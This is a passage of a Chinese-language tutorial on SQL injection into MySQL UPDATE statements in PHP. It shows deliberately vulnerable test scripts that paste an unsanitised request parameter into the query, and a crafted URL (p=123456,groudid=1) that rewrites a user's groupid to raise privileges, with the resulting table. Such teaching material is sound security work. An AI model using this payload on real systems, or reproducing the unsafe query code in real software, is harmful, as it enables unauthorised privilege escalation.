UPDATE注射(mysql+php)的两个模式

$result = mysql_db_query($dbname, $sql);

$userinfo = mysql_fetch_array($result);

echo "<p>SQL Query:$sql<p>";

?>

脚本里只是修改user=’heige’的pass，如果groudid表示用户的权限等级，我们的目的就是通过构造$p 来达

到修改groupid的目的：

那么我们提交：http://127.0.0.1/test1.php?p=123456,groudid=1

在mysql里查询： mysql> select * from userinfo;

+---------+-------+--------+

| groudid | user　| pass　 |

+---------+-------+--------+

| 1　　　 | heige | 123456 |

+---------+-------+--------+

1 row in set (0.01 sec)

用户heige的groudid又2改为1了 :)

所以我们可以得到没有’’或"" update的注射是可以成功的，这个就是我们的模式1。

2,变量带’’或""[MOD2]

?php

//test2.php

$servername = "localhost";

$dbusername = "root";

$dbpassword = "";

$dbname = "test";

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");

$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用单引号